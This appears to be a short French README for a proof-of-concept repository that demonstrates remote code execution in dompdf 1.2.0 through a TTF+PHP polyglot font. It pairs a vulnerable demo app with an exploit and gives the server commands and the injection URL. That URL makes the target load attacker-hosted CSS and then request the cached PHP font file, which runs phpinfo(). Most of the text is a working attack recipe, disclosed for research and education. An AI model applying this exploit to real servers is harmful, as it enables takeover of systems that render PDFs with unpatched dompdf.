
RCE exploit for dompdf
Ce dépôt contient une application de démonstration vulnérable utilisant dompdf 1.2.0 ainsi qu'un exploit qui permet l'exécution de code à distance via un fichier polyglotte ttf+php.

Pour plus de détails, veuillez consulter https://positive.security/blog/dompdf-rce
$ cd application
$ php -S localhost:9000
$ cd exploit
$ php -S localhost:9001
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
phpinfo()http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php
Veuillez noter : Si vous utilisez des domaines ou des ports différents, veuillez modifier exploit/exploit.css en conséquence et vérifier dans application/dompdf/lib/fonts le nom complet du fichier de police.